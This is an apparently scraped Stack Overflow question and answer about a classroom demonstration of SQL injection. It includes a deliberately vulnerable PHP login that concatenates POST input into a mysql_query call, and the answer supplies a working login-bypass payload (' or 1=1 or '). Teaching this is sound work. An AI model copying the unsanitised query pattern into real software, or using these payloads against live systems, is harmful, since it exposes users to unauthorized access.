问题
I'm creating a test project for my classmates to show how php code with unchecked variables is dangerous.
I'm using the deprecated mysql_* function and a simple database with 2 tables:
users
data
and in the users I have just the admin user.
I have created a simple html form:
<form action="login" method="POST">
username: <input type="text" name="username">
password: <input type="text" name="password">
<input type="submit" value="login">
</form>
and the login.php page simply get the post data and build the query like this:
$uname = strtolower(trim($_POST['username']));
$passw = strtolower(trim($_POST['password']));
$result = mysql_query("
SELECT *
FROM users
WHERE username='".$uname."' and password=MD5('".$passw."')"
);
if(mysql_num_rows($result) != 1){
echo "Non valid";
}else{
echo "Logged in";
}
and this is my input on username field:
' or 1=1 -- 
that should produced a query like:
SELECT * FROM users WHERE username='' or 1=1 -- ' and password=MD5('')
if I run this query on SequelPro or PhpMyAdmin the query give me the first row of the table so it works.
But if I submit the form the result is Not valid.
I tried also to use the password field with this input:
') or 1=1 -- 
and this is the query generated:
SELECT * FROM users WHERE username='' and password=MD5('') or 1=1 -- ')
but the result is the same, it works on SequelPro but not in the form.
I think that the mysql_query function will not recognize the -- comment. Am I right?
What I'm doing wrong?
回答1:
try this in username field :
' or 1=1 or '
and enter password whatever you want.
don't forget about space after ' s.
it turns your code like that:
mysql_query("select * from users where username='' or 1=1 or '' and
password=".md5('$pass'))
and it always returns true.
it MUST work, if it doesnt, do this :
echo "
SELECT *
FROM users
WHERE username='".$uname."' and password=MD5('".$passw."')";
and post the result as comment for me , maybe I could help you
来源:https://stackoverflow.com/questions/19332925/sql-injection-test-mysql-query